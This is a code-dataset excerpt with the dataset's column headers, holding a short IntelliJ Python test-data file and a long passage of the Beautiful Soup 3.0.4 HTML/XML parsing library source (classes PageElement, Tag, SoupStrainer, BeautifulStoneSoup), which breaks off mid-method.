repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
|---|---|---|---|---|
MichaelNedzelsky/intellij-community
|
refs/heads/master
|
python/testData/editing/unindentTab.before.py
|
83
|
#// python 3
class C:
def m(self): #// note: TABs instead of spaces
pass
|
nickbenes/GeoSense
|
refs/heads/master
|
public-build/lib/openlayers/OpenLayers-2.13.1/tools/BeautifulSoup.py
|
307
|
"""Beautiful Soup
Elixir and Tonic
"The Screen-Scraper's Friend"
http://www.crummy.com/software/BeautifulSoup/
Beautiful Soup parses a (possibly invalid) XML or HTML document into a
tree representation. It provides methods and Pythonic idioms that make
it easy to navigate, search, and modify the tree.
A well-formed XML/HTML document yields a well-formed data
structure. An ill-formed XML/HTML document yields a correspondingly
ill-formed data structure. If your document is only locally
well-formed, you can use this library to find and process the
well-formed part of it. The BeautifulSoup class
Beautiful Soup works with Python 2.2 and up. It has no external
dependencies, but you'll have more success at converting data to UTF-8
if you also install these three packages:
* chardet, for auto-detecting character encodings
http://chardet.feedparser.org/
* cjkcodecs and iconv_codec, which add more encodings to the ones supported
by stock Python.
http://cjkpython.i18n.org/
Beautiful Soup defines classes for two main parsing strategies:
* BeautifulStoneSoup, for parsing XML, SGML, or your domain-specific
language that kind of looks like XML.
* BeautifulSoup, for parsing run-of-the-mill HTML code, be it valid
or invalid. This class has web browser-like heuristics for
obtaining a sensible parse tree in the face of common HTML errors.
Beautiful Soup also defines a class (UnicodeDammit) for autodetecting
the encoding of an HTML or XML document, and converting it to
Unicode. Much of this code is taken from Mark Pilgrim's Universal Feed Parser.
For more than you ever wanted to know about Beautiful Soup, see the
documentation:
http://www.crummy.com/software/BeautifulSoup/documentation.html
"""
from __future__ import generators
__author__ = "Leonard Richardson (leonardr@segfault.org)"
__version__ = "3.0.4"
__copyright__ = "Copyright (c) 2004-2007 Leonard Richardson"
__license__ = "PSF"
from sgmllib import SGMLParser, SGMLParseError
import codecs
import types
import re
import sgmllib
try:
from htmlentitydefs import name2codepoint
except ImportError:
name2codepoint = {}
#This hack makes Beautiful Soup able to parse XML with namespaces
sgmllib.tagfind = re.compile('[a-zA-Z][-_.:a-zA-Z0-9]*')
DEFAULT_OUTPUT_ENCODING = "utf-8"
# First, the classes that represent markup elements.
class PageElement:
"""Contains the navigational information for some part of the page
(either a tag or a piece of text)"""
def setup(self, parent=None, previous=None):
"""Sets up the initial relations between this element and
other elements."""
self.parent = parent
self.previous = previous
self.next = None
self.previousSibling = None
self.nextSibling = None
if self.parent and self.parent.contents:
self.previousSibling = self.parent.contents[-1]
self.previousSibling.nextSibling = self
def replaceWith(self, replaceWith):
oldParent = self.parent
myIndex = self.parent.contents.index(self)
if hasattr(replaceWith, 'parent') and replaceWith.parent == self.parent:
# We're replacing this element with one of its siblings.
index = self.parent.contents.index(replaceWith)
if index and index < myIndex:
# Furthermore, it comes before this element. That
# means that when we extract it, the index of this
# element will change.
myIndex = myIndex - 1
self.extract()
oldParent.insert(myIndex, replaceWith)
def extract(self):
"""Destructively rips this element out of the tree."""
if self.parent:
try:
self.parent.contents.remove(self)
except ValueError:
pass
#Find the two elements that would be next to each other if
#this element (and any children) hadn't been parsed. Connect
#the two.
lastChild = self._lastRecursiveChild()
nextElement = lastChild.next
if self.previous:
self.previous.next = nextElement
if nextElement:
nextElement.previous = self.previous
self.previous = None
lastChild.next = None
self.parent = None
if self.previousSibling:
self.previousSibling.nextSibling = self.nextSibling
if self.nextSibling:
self.nextSibling.previousSibling = self.previousSibling
self.previousSibling = self.nextSibling = None
def _lastRecursiveChild(self):
"Finds the last element beneath this object to be parsed."
lastChild = self
while hasattr(lastChild, 'contents') and lastChild.contents:
lastChild = lastChild.contents[-1]
return lastChild
def insert(self, position, newChild):
if (isinstance(newChild, basestring)
or isinstance(newChild, unicode)) \
and not isinstance(newChild, NavigableString):
newChild = NavigableString(newChild)
position = min(position, len(self.contents))
if hasattr(newChild, 'parent') and newChild.parent != None:
# We're 'inserting' an element that's already one
# of this object's children.
if newChild.parent == self:
index = self.find(newChild)
if index and index < position:
# Furthermore we're moving it further down the
# list of this object's children. That means that
# when we extract this element, our target index
# will jump down one.
position = position - 1
newChild.extract()
newChild.parent = self
previousChild = None
if position == 0:
newChild.previousSibling = None
newChild.previous = self
else:
previousChild = self.contents[position-1]
newChild.previousSibling = previousChild
newChild.previousSibling.nextSibling = newChild
newChild.previous = previousChild._lastRecursiveChild()
if newChild.previous:
newChild.previous.next = newChild
newChildsLastElement = newChild._lastRecursiveChild()
if position >= len(self.contents):
newChild.nextSibling = None
parent = self
parentsNextSibling = None
while not parentsNextSibling:
parentsNextSibling = parent.nextSibling
parent = parent.parent
if not parent: # This is the last element in the document.
break
if parentsNextSibling:
newChildsLastElement.next = parentsNextSibling
else:
newChildsLastElement.next = None
else:
nextChild = self.contents[position]
newChild.nextSibling = nextChild
if newChild.nextSibling:
newChild.nextSibling.previousSibling = newChild
newChildsLastElement.next = nextChild
if newChildsLastElement.next:
newChildsLastElement.next.previous = newChildsLastElement
self.contents.insert(position, newChild)
def findNext(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the first item that matches the given criteria and
appears after this Tag in the document."""
return self._findOne(self.findAllNext, name, attrs, text, **kwargs)
def findAllNext(self, name=None, attrs={}, text=None, limit=None,
**kwargs):
"""Returns all items that match the given criteria and appear
before after Tag in the document."""
return self._findAll(name, attrs, text, limit, self.nextGenerator)
def findNextSibling(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the closest sibling to this Tag that matches the
given criteria and appears after this Tag in the document."""
return self._findOne(self.findNextSiblings, name, attrs, text,
**kwargs)
def findNextSiblings(self, name=None, attrs={}, text=None, limit=None,
**kwargs):
"""Returns the siblings of this Tag that match the given
criteria and appear after this Tag in the document."""
return self._findAll(name, attrs, text, limit,
self.nextSiblingGenerator, **kwargs)
fetchNextSiblings = findNextSiblings # Compatibility with pre-3.x
def findPrevious(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the first item that matches the given criteria and
appears before this Tag in the document."""
return self._findOne(self.findAllPrevious, name, attrs, text, **kwargs)
def findAllPrevious(self, name=None, attrs={}, text=None, limit=None,
**kwargs):
"""Returns all items that match the given criteria and appear
before this Tag in the document."""
return self._findAll(name, attrs, text, limit, self.previousGenerator,
**kwargs)
fetchPrevious = findAllPrevious # Compatibility with pre-3.x
def findPreviousSibling(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the closest sibling to this Tag that matches the
given criteria and appears before this Tag in the document."""
return self._findOne(self.findPreviousSiblings, name, attrs, text,
**kwargs)
def findPreviousSiblings(self, name=None, attrs={}, text=None,
limit=None, **kwargs):
"""Returns the siblings of this Tag that match the given
criteria and appear before this Tag in the document."""
return self._findAll(name, attrs, text, limit,
self.previousSiblingGenerator, **kwargs)
fetchPreviousSiblings = findPreviousSiblings # Compatibility with pre-3.x
def findParent(self, name=None, attrs={}, **kwargs):
"""Returns the closest parent of this Tag that matches the given
criteria."""
# NOTE: We can't use _findOne because findParents takes a different
# set of arguments.
r = None
l = self.findParents(name, attrs, 1)
if l:
r = l[0]
return r
def findParents(self, name=None, attrs={}, limit=None, **kwargs):
"""Returns the parents of this Tag that match the given
criteria."""
return self._findAll(name, attrs, None, limit, self.parentGenerator,
**kwargs)
fetchParents = findParents # Compatibility with pre-3.x
#These methods do the real heavy lifting.
def _findOne(self, method, name, attrs, text, **kwargs):
r = None
l = method(name, attrs, text, 1, **kwargs)
if l:
r = l[0]
return r
def _findAll(self, name, attrs, text, limit, generator, **kwargs):
"Iterates over a generator looking for things that match."
if isinstance(name, SoupStrainer):
strainer = name
else:
# Build a SoupStrainer
strainer = SoupStrainer(name, attrs, text, **kwargs)
results = ResultSet(strainer)
g = generator()
while True:
try:
i = g.next()
except StopIteration:
break
if i:
found = strainer.search(i)
if found:
results.append(found)
if limit and len(results) >= limit:
break
return results
#These Generators can be used to navigate starting from both
#NavigableStrings and Tags.
def nextGenerator(self):
i = self
while i:
i = i.next
yield i
def nextSiblingGenerator(self):
i = self
while i:
i = i.nextSibling
yield i
def previousGenerator(self):
i = self
while i:
i = i.previous
yield i
def previousSiblingGenerator(self):
i = self
while i:
i = i.previousSibling
yield i
def parentGenerator(self):
i = self
while i:
i = i.parent
yield i
# Utility methods
def substituteEncoding(self, str, encoding=None):
encoding = encoding or "utf-8"
return str.replace("%SOUP-ENCODING%", encoding)
def toEncoding(self, s, encoding=None):
"""Encodes an object to a string in some encoding, or to Unicode.
."""
if isinstance(s, unicode):
if encoding:
s = s.encode(encoding)
elif isinstance(s, str):
if encoding:
s = s.encode(encoding)
else:
s = unicode(s)
else:
if encoding:
s = self.toEncoding(str(s), encoding)
else:
s = unicode(s)
return s
class NavigableString(unicode, PageElement):
def __getattr__(self, attr):
"""text.string gives you text. This is for backwards
compatibility for Navigable*String, but for CData* it lets you
get the string without the CData wrapper."""
if attr == 'string':
return self
else:
raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__.__name__, attr)
def __unicode__(self):
return self.__str__(None)
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):
if encoding:
return self.encode(encoding)
else:
return self
class CData(NavigableString):
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):
return "<![CDATA[%s]]>" % NavigableString.__str__(self, encoding)
class ProcessingInstruction(NavigableString):
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):
output = self
if "%SOUP-ENCODING%" in output:
output = self.substituteEncoding(output, encoding)
return "<?%s?>" % self.toEncoding(output, encoding)
class Comment(NavigableString):
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):
return "<!--%s-->" % NavigableString.__str__(self, encoding)
class Declaration(NavigableString):
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):
return "<!%s>" % NavigableString.__str__(self, encoding)
class Tag(PageElement):
"""Represents a found HTML tag with its attributes and contents."""
XML_SPECIAL_CHARS_TO_ENTITIES = { "'" : "squot",
'"' : "quote",
"&" : "amp",
"<" : "lt",
">" : "gt" }
def __init__(self, parser, name, attrs=None, parent=None,
previous=None):
"Basic constructor."
# We don't actually store the parser object: that lets extracted
# chunks be garbage-collected
self.parserClass = parser.__class__
self.isSelfClosing = parser.isSelfClosingTag(name)
self.name = name
if attrs == None:
attrs = []
self.attrs = attrs
self.contents = []
self.setup(parent, previous)
self.hidden = False
self.containsSubstitutions = False
def get(self, key, default=None):
"""Returns the value of the 'key' attribute for the tag, or
the value given for 'default' if it doesn't have that
attribute."""
return self._getAttrMap().get(key, default)
def has_key(self, key):
return self._getAttrMap().has_key(key)
def __getitem__(self, key):
"""tag[key] returns the value of the 'key' attribute for the tag,
and throws an exception if it's not there."""
return self._getAttrMap()[key]
def __iter__(self):
"Iterating over a tag iterates over its contents."
return iter(self.contents)
def __len__(self):
"The length of a tag is the length of its list of contents."
return len(self.contents)
def __contains__(self, x):
return x in self.contents
def __nonzero__(self):
"A tag is non-None even if it has no contents."
return True
def __setitem__(self, key, value):
"""Setting tag[key] sets the value of the 'key' attribute for the
tag."""
self._getAttrMap()
self.attrMap[key] = value
found = False
for i in range(0, len(self.attrs)):
if self.attrs[i][0] == key:
self.attrs[i] = (key, value)
found = True
if not found:
self.attrs.append((key, value))
self._getAttrMap()[key] = value
def __delitem__(self, key):
"Deleting tag[key] deletes all 'key' attributes for the tag."
for item in self.attrs:
if item[0] == key:
self.attrs.remove(item)
#We don't break because bad HTML can define the same
#attribute multiple times.
self._getAttrMap()
if self.attrMap.has_key(key):
del self.attrMap[key]
def __call__(self, *args, **kwargs):
"""Calling a tag like a function is the same as calling its
findAll() method. Eg. tag('a') returns a list of all the A tags
found within this tag."""
return apply(self.findAll, args, kwargs)
def __getattr__(self, tag):
#print "Getattr %s.%s" % (self.__class__, tag)
if len(tag) > 3 and tag.rfind('Tag') == len(tag)-3:
return self.find(tag[:-3])
elif tag.find('__') != 0:
return self.find(tag)
def __eq__(self, other):
"""Returns true iff this tag has the same name, the same attributes,
and the same contents (recursively) as the given tag.
NOTE: right now this will return false if two tags have the
same attributes in a different order. Should this be fixed?"""
if not hasattr(other, 'name') or not hasattr(other, 'attrs') or not hasattr(other, 'contents') or self.name != other.name or self.attrs != other.attrs or len(self) != len(other):
return False
for i in range(0, len(self.contents)):
if self.contents[i] != other.contents[i]:
return False
return True
def __ne__(self, other):
"""Returns true iff this tag is not identical to the other tag,
as defined in __eq__."""
return not self == other
def __repr__(self, encoding=DEFAULT_OUTPUT_ENCODING):
"""Renders this tag as a string."""
return self.__str__(encoding)
def __unicode__(self):
return self.__str__(None)
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING,
prettyPrint=False, indentLevel=0):
"""Returns a string or Unicode representation of this tag and
its contents. To get Unicode, pass None for encoding.
NOTE: since Python's HTML parser consumes whitespace, this
method is not certain to reproduce the whitespace present in
the original string."""
encodedName = self.toEncoding(self.name, encoding)
attrs = []
if self.attrs:
for key, val in self.attrs:
fmt = '%s="%s"'
if isString(val):
if self.containsSubstitutions and '%SOUP-ENCODING%' in val:
val = self.substituteEncoding(val, encoding)
# The attribute value either:
#
# * Contains no embedded double quotes or single quotes.
# No problem: we enclose it in double quotes.
# * Contains embedded single quotes. No problem:
# double quotes work here too.
# * Contains embedded double quotes. No problem:
# we enclose it in single quotes.
# * Embeds both single _and_ double quotes. This
# can't happen naturally, but it can happen if
# you modify an attribute value after parsing
# the document. Now we have a bit of a
# problem. We solve it by enclosing the
# attribute in single quotes, and escaping any
# embedded single quotes to XML entities.
if '"' in val:
fmt = "%s='%s'"
# This can't happen naturally, but it can happen
# if you modify an attribute value after parsing.
if "'" in val:
val = val.replace("'", "&squot;")
# Now we're okay w/r/t quotes. But the attribute
# value might also contain angle brackets, or
# ampersands that aren't part of entities. We need
# to escape those to XML entities too.
val = re.sub("([<>]|&(?![^\s]+;))",
lambda x: "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";",
val)
attrs.append(fmt % (self.toEncoding(key, encoding),
self.toEncoding(val, encoding)))
close = ''
closeTag = ''
if self.isSelfClosing:
close = ' /'
else:
closeTag = '</%s>' % encodedName
indentTag, indentContents = 0, 0
if prettyPrint:
indentTag = indentLevel
space = (' ' * (indentTag-1))
indentContents = indentTag + 1
contents = self.renderContents(encoding, prettyPrint, indentContents)
if self.hidden:
s = contents
else:
s = []
attributeString = ''
if attrs:
attributeString = ' ' + ' '.join(attrs)
if prettyPrint:
s.append(space)
s.append('<%s%s%s>' % (encodedName, attributeString, close))
if prettyPrint:
s.append("\n")
s.append(contents)
if prettyPrint and contents and contents[-1] != "\n":
s.append("\n")
if prettyPrint and closeTag:
s.append(space)
s.append(closeTag)
if prettyPrint and closeTag and self.nextSibling:
s.append("\n")
s = ''.join(s)
return s
def prettify(self, encoding=DEFAULT_OUTPUT_ENCODING):
return self.__str__(encoding, True)
def renderContents(self, encoding=DEFAULT_OUTPUT_ENCODING,
prettyPrint=False, indentLevel=0):
"""Renders the contents of this tag as a string in the given
encoding. If encoding is None, returns a Unicode string.."""
s=[]
for c in self:
text = None
if isinstance(c, NavigableString):
text = c.__str__(encoding)
elif isinstance(c, Tag):
s.append(c.__str__(encoding, prettyPrint, indentLevel))
if text and prettyPrint:
text = text.strip()
if text:
if prettyPrint:
s.append(" " * (indentLevel-1))
s.append(text)
if prettyPrint:
s.append("\n")
return ''.join(s)
#Soup methods
def find(self, name=None, attrs={}, recursive=True, text=None,
**kwargs):
"""Return only the first child of this Tag matching the given
criteria."""
r = None
l = self.findAll(name, attrs, recursive, text, 1, **kwargs)
if l:
r = l[0]
return r
findChild = find
def findAll(self, name=None, attrs={}, recursive=True, text=None,
limit=None, **kwargs):
"""Extracts a list of Tag objects that match the given
criteria. You can specify the name of the Tag and any
attributes you want the Tag to have.
The value of a key-value pair in the 'attrs' map can be a
string, a list of strings, a regular expression object, or a
callable that takes a string and returns whether or not the
string matches for some custom definition of 'matches'. The
same is true of the tag name."""
generator = self.recursiveChildGenerator
if not recursive:
generator = self.childGenerator
return self._findAll(name, attrs, text, limit, generator, **kwargs)
findChildren = findAll
# Pre-3.x compatibility methods
first = find
fetch = findAll
def fetchText(self, text=None, recursive=True, limit=None):
return self.findAll(text=text, recursive=recursive, limit=limit)
def firstText(self, text=None, recursive=True):
return self.find(text=text, recursive=recursive)
#Utility methods
def append(self, tag):
"""Appends the given tag to the contents of this tag."""
self.contents.append(tag)
#Private methods
def _getAttrMap(self):
"""Initializes a map representation of this tag's attributes,
if not already initialized."""
if not getattr(self, 'attrMap'):
self.attrMap = {}
for (key, value) in self.attrs:
self.attrMap[key] = value
return self.attrMap
#Generator methods
def childGenerator(self):
for i in range(0, len(self.contents)):
yield self.contents[i]
raise StopIteration
def recursiveChildGenerator(self):
stack = [(self, 0)]
while stack:
tag, start = stack.pop()
if isinstance(tag, Tag):
for i in range(start, len(tag.contents)):
a = tag.contents[i]
yield a
if isinstance(a, Tag) and tag.contents:
if i < len(tag.contents) - 1:
stack.append((tag, i+1))
stack.append((a, 0))
break
raise StopIteration
# Next, a couple classes to represent queries and their results.
class SoupStrainer:
"""Encapsulates a number of ways of matching a markup element (tag or
text)."""
def __init__(self, name=None, attrs={}, text=None, **kwargs):
self.name = name
if isString(attrs):
kwargs['class'] = attrs
attrs = None
if kwargs:
if attrs:
attrs = attrs.copy()
attrs.update(kwargs)
else:
attrs = kwargs
self.attrs = attrs
self.text = text
def __str__(self):
if self.text:
return self.text
else:
return "%s|%s" % (self.name, self.attrs)
def searchTag(self, markupName=None, markupAttrs={}):
found = None
markup = None
if isinstance(markupName, Tag):
markup = markupName
markupAttrs = markup
callFunctionWithTagData = callable(self.name) \
and not isinstance(markupName, Tag)
if (not self.name) \
or callFunctionWithTagData \
or (markup and self._matches(markup, self.name)) \
or (not markup and self._matches(markupName, self.name)):
if callFunctionWithTagData:
match = self.name(markupName, markupAttrs)
else:
match = True
markupAttrMap = None
for attr, matchAgainst in self.attrs.items():
if not markupAttrMap:
if hasattr(markupAttrs, 'get'):
markupAttrMap = markupAttrs
else:
markupAttrMap = {}
for k,v in markupAttrs:
markupAttrMap[k] = v
attrValue = markupAttrMap.get(attr)
if not self._matches(attrValue, matchAgainst):
match = False
break
if match:
if markup:
found = markup
else:
found = markupName
return found
def search(self, markup):
#print 'looking for %s in %s' % (self, markup)
found = None
# If given a list of items, scan it for a text element that
# matches.
if isList(markup) and not isinstance(markup, Tag):
for element in markup:
if isinstance(element, NavigableString) \
and self.search(element):
found = element
break
# If it's a Tag, make sure its name or attributes match.
# Don't bother with Tags if we're searching for text.
elif isinstance(markup, Tag):
if not self.text:
found = self.searchTag(markup)
# If it's text, make sure the text matches.
elif isinstance(markup, NavigableString) or \
isString(markup):
if self._matches(markup, self.text):
found = markup
else:
raise Exception, "I don't know how to match against a %s" \
% markup.__class__
return found
def _matches(self, markup, matchAgainst):
#print "Matching %s against %s" % (markup, matchAgainst)
result = False
if matchAgainst == True and type(matchAgainst) == types.BooleanType:
result = markup != None
elif callable(matchAgainst):
result = matchAgainst(markup)
else:
#Custom match methods take the tag as an argument, but all
#other ways of matching match the tag name as a string.
if isinstance(markup, Tag):
markup = markup.name
if markup and not isString(markup):
markup = unicode(markup)
#Now we know that chunk is either a string, or None.
if hasattr(matchAgainst, 'match'):
# It's a regexp object.
result = markup and matchAgainst.search(markup)
elif isList(matchAgainst):
result = markup in matchAgainst
elif hasattr(matchAgainst, 'items'):
result = markup.has_key(matchAgainst)
elif matchAgainst and isString(markup):
if isinstance(markup, unicode):
matchAgainst = unicode(matchAgainst)
else:
matchAgainst = str(matchAgainst)
if not result:
result = matchAgainst == markup
return result
class ResultSet(list):
"""A ResultSet is just a list that keeps track of the SoupStrainer
that created it."""
def __init__(self, source):
list.__init__([])
self.source = source
# Now, some helper functions.
def isList(l):
"""Convenience method that works with all 2.x versions of Python
to determine whether or not something is listlike."""
return hasattr(l, '__iter__') \
or (type(l) in (types.ListType, types.TupleType))
def isString(s):
"""Convenience method that works with all 2.x versions of Python
to determine whether or not something is stringlike."""
try:
return isinstance(s, unicode) or isintance(s, basestring)
except NameError:
return isinstance(s, str)
def buildTagMap(default, *args):
"""Turns a list of maps, lists, or scalars into a single map.
Used to build the SELF_CLOSING_TAGS, NESTABLE_TAGS, and
NESTING_RESET_TAGS maps out of lists and partial maps."""
built = {}
for portion in args:
if hasattr(portion, 'items'):
#It's a map. Merge it.
for k,v in portion.items():
built[k] = v
elif isList(portion):
#It's a list. Map each item to the default.
for k in portion:
built[k] = default
else:
#It's a scalar. Map it to the default.
built[portion] = default
return built
# Now, the parser classes.
class BeautifulStoneSoup(Tag, SGMLParser):
"""This class contains the basic parser and search code. It defines
a parser that knows nothing about tag behavior except for the
following:
You can't close a tag without closing all the tags it encloses.
That is, "<foo><bar></foo>" actually means
"<foo><bar></bar></foo>".
[Another possible explanation is "<foo><bar /></foo>", but since
this class defines no SELF_CLOSING_TAGS, it will never use that
explanation.]
This class is useful for parsing XML or made-up markup languages,
or when BeautifulSoup makes an assumption counter to what you were
expecting."""
XML_ENTITY_LIST = {}
for i in Tag.XML_SPECIAL_CHARS_TO_ENTITIES.values():
XML_ENTITY_LIST[i] = True
SELF_CLOSING_TAGS = {}
NESTABLE_TAGS = {}
RESET_NESTING_TAGS = {}
QUOTE_TAGS = {}
MARKUP_MASSAGE = [(re.compile('(<[^<>]*)/>'),
lambda x: x.group(1) + ' />'),
(re.compile('<!\s+([^<>]*)>'),
lambda x: '<!' + x.group(1) + '>')
]
ROOT_TAG_NAME = u'[document]'
HTML_ENTITIES = "html"
XML_ENTITIES = "xml"
def __init__(self, markup="", parseOnlyThese=None, fromEncoding=None,
markupMassage=True, smartQuotesTo=XML_ENTITIES,
convertEntities=None, selfClosingTags=None):
"""The Soup object is initialized as the 'root tag', and the
provided markup (which can be a string or a file-like object)
is fed into the underlying parser.
sgmllib will process most bad HTML, and the BeautifulSoup
class has some tricks for dealing with some HTML that kills
sgmllib, but Beautiful Soup can nonetheless choke or lose data
if your data uses self-closing tags or declarations
incorrectly.
By default, Beautiful Soup uses regexes to sanitize input,
avoiding the vast majority of these problems. If the problems
don't apply to you, pass in False for markupMassage, and
you'll get better performance.
The default parser massage techniques fix the two most common
instances of invalid HTML that choke sgmllib:
<br/> (No space between name of closing tag and tag close)
<! --Comment--> (Extraneous whitespace in declaration)
You can pass in a custom list of (RE object, replace method)
tuples to get Beautiful Soup to scrub your input the way you
want."""
self.parseOnlyThese = parseOnlyThese
self.fromEncoding = fromEncoding
self.smartQuotesTo = smartQuotesTo
self.convertEntities = convertEntities
if self.convertEntities:
# It doesn't make sense to convert encoded characters to
# entities even while you're converting entities to Unicode.
# Just convert it all to Unicode.
self.smartQuotesTo = None
self.instanceSelfClosingTags = buildTagMap(None, selfClosingTags)
SGMLParser.__init__(self)
if hasattr(markup, 'read'): # It's a file-type object.
markup = markup.read()
self.markup = markup
self.markupMassage = markupMassage
try:
self._feed()
except StopParsing:
pass
self.markup = None # The markup can now be GCed
def _feed(self, inDocumentEncoding=None):
# Convert the document to Unicode.
markup = self.markup
if isinstance(markup, unicode):
if not hasattr(self, 'originalEncoding'):
self.originalEncoding = None
else:
dammit = UnicodeDammit\
(markup, [self.fromEncoding, inDocumentEncoding],
smartQuotesTo=self.smartQuotesTo)
markup = dammit.unicode
self.originalEncoding = dammit.originalEncoding
if markup:
if self.markupMassage:
if not isList(self.markupMassage):
self.markupMassage = self.MARKUP_MASSAGE
for fix, m in self.markupMassage:
markup = fix.sub(m, markup)
self.reset()
SGMLParser.feed(self, markup)
# Close out any unfinished strings and close all the open tags.
self.endData()
while self.currentTag.name != self.ROOT_TAG_NAME:
self.popTag()
def __getattr__(self, methodName):
"""This method routes method call requests to either the SGMLParser
superclass or the Tag superclass, depending on the method name."""
#print "__getattr__ called on %s.%s" % (self.__class__, methodName)
if methodName.find('start_') == 0 or methodName.find('end_') == 0 \
or methodName.find('do_') == 0:
return SGMLParser.__getattr__(self, methodName)
elif methodName.find('__') != 0:
return Tag.__getattr__(self, methodName)
else:
raise AttributeError
def isSelfClosingTag(self, name):
"""Returns true iff the given string is the name of a
self-closing tag according to this parser."""
return self.SELF_CLOSING_TAGS.has_key(name) \
or self.instanceSelfClosingTags.has_key(name)
def reset(self):
Tag.__init__(self, self, self.ROOT_TAG_NAME)
self.hidden = 1
SGMLParser.reset(self)
self.currentData = []
self.currentTag = None
self.tagStack = []
self.quoteStack = []
self.pushTag(self)
def popTag(self):
tag = self.tagStack.pop()
# Tags with just one string-owning child get the child as a
# 'string' property, so that soup.tag.string is shorthand for
# soup.tag.contents[0]
if len(self.currentTag.contents) == 1 and \
isinstance(self.currentTag.contents[0], NavigableString):
self.currentTag.string = self.currentTag.contents[0]
#print "Pop", tag.name
if self.tagStack:
self.currentTag = self.tagStack[-1]
return self.currentTag
def pushTag(self, tag):
#print "Push", tag.name
if self.currentTag:
self.currentTag.append(tag)
self.tagStack.append(tag)
self.currentTag = self.tagStack[-1]
def endData(self, containerClass=NavigableString):
if self.currentData:
currentData = ''.join(self.currentData)
if not currentData.strip():
if '\n' in currentData:
currentData = '\n'
else:
currentData = ' '
self.currentData = []
if self.parseOnlyThese and len(self.tagStack) <= 1 and \
(not self.parseOnlyThese.text or \
not self.parseOnlyThese.search(currentData)):
return
o = containerClass(currentData)
o.setup(self.currentTag, self.previous)
if self.previous:
self.previous.next = o
self.previous = o
self.currentTag.contents.append(o)
def _popToTag(self, name, inclusivePop=True):
"""Pops the tag stack up to and including the most recent
instance of the given tag. If inclusivePop is false, pops the tag
stack up to but *not* including the most recent instqance of
the given tag."""
#print "Popping to %s" % name
if name == self.ROOT_TAG_NAME:
return
numPops = 0
mostRecentTag = None
for i in range(len(self.tagStack)-1, 0, -1):
if name == self.tagStack[i].name:
numPops = len(self.tagStack)-i
break
if not inclusivePop:
numPops = numPops - 1
for i in range(0, numPops):
mostRecentTag = self.popTag()
return mostRecentTag
def _smartPop(self, name):
"""We need to pop up to the previous tag of this type, unless
one of this tag's nesting reset triggers comes between this
tag and the previous tag of this type, OR unless this tag is a
generic nesting trigger and another generic nesting trigger
comes between this tag and the previous tag of this type.
Examples:
<p>Foo<b>Bar<p> should pop to 'p', not 'b'.
<p>Foo<table>Bar<p> should pop to 'table', not 'p'.
<p>Foo<table><tr>Bar<p> should pop to 'tr', not 'p'.
<p>Foo<b>Bar<p> should pop to 'p', not 'b'.
<li><ul><li> *<li>* should pop to 'ul', not the first 'li'.
<tr><table><tr> *<tr>* should pop to 'table', not the first 'tr'
<td><tr><td> *<td>* should pop to 'tr', not the first 'td'
"""
nestingResetTriggers = self.NESTABLE_TAGS.get(name)
isNestable = nestingResetTriggers != None
isResetNesting = self.RESET_NESTING_TAGS.has_key(name)
popTo = None
inclusive = True
for i in range(len(self.tagStack)-1, 0, -1):
p = self.tagStack[i]
if (not p or p.name == name) and not isNestable:
#Non-nestable tags get popped to the top or to their
#last occurance.
popTo = name
break
if (nestingResetTriggers != None
and p.name in nestingResetTriggers) \
or (nestingResetTriggers == None and isResetNesting
and self.RESET_NESTING_TAGS.has_key(p.name)):
#If we encounter one of the nesting reset triggers
#peculiar to this tag, or we encounter another tag
#that causes nesting to reset, pop up to but not
#including that tag.
popTo = p.name
inclusive = False
break
p = p.parent
if popTo:
self._popToTag(popTo, inclusive)
def unknown_starttag(self, name, attrs, selfClosing=0):
#print "Start tag %s: %s" % (name, attrs)
if self.quoteStack:
#This is not a real tag.
#print "<%s> is not real!" % name
attrs = ''.join(map(lambda(x, y): ' %s="%s"' % (x, y), attrs))
self.handle_data('<%s%s>' % (name, attrs))
return
self.endData()
if not self.isSelfClosingTag(name) and not selfClosing:
self._smartPop(name)
if self.parseOnlyThese and len(self.tagStack) <= 1 \
and (self.parseOnlyThese.text or not self.parseOnlyThese.searchTag(name, attrs)):
return
tag = Tag(self, name, attrs, self.currentTag, self.previous)
if self.previous:
self.previous.next = tag
self.previous = tag
self.pushTag(tag)
if selfClosing or self.isSelfClosingTag(name):
self.popTag()
if name in self.QUOTE_TAGS:
#print "Beginning quote (%s)" % name
self.quoteStack.append(name)
self.literal = 1
return tag
def unknown_endtag(self, name):
#print "End tag %s" % name
if self.quoteStack and self.quoteStack[-1] != name:
#This is not a real end tag.
#print "</%s> is not real!" % name
self.handle_data('</%s>' % name)
return
self.endData()
self._popToTag(name)
if self.quoteStack and self.quoteStack[-1] == name:
self.quoteStack.pop()
self.literal = (len(self.quoteStack) > 0)
def handle_data(self, data):
self.currentData.append(data)
def _toStringSubclass(self, text, subclass):
"""Adds a certain piece of text to the tree as a NavigableString
subclass."""
self.endData()
self.handle_data(text)
self.endData(subclass)
def handle_pi(self, text):
"""Handle a processing instruction as a ProcessingInstruction
object, possibly one with a %SOUP-ENCODING% slot into which an
encoding will be plugged later."""
if text[:3] == "xml":
text = "xml version='1.0' encoding='%SOUP-ENCODING%'"
self._toStringSubclass(text, ProcessingInstruction)
def handle_comment(self, text):
"Handle comments as Comment objects."
self._toStringSubclass(text, Comment)
def handle_charref(self, ref):
"Handle character references as data."
if self.convertEntities in [self.HTML_ENTITIES,
self.XML_ENTITIES]:
data = unichr(int(ref))
else:
data = '&#%s;' % ref
self.handle_data(data)
def handle_entityref(self, ref):
"""Handle entity references as data, possibly converting known
HTML entity references to the corresponding Unicode
characters."""
data = None
if self.convertEntities == self.HTML_ENTITIES or \
(self.convertEntities == self.XML_ENTITIES and \
self.XML_ENTITY_LIST.get(ref)):
try:
data = unichr(name2codepoint[ref])
except KeyError:
pass
if not data:
data = '&%s;' % ref
self.handle_data(data)
def handle_decl(self, data):
"Handle DOCTYPEs and the like as Declaration objects."
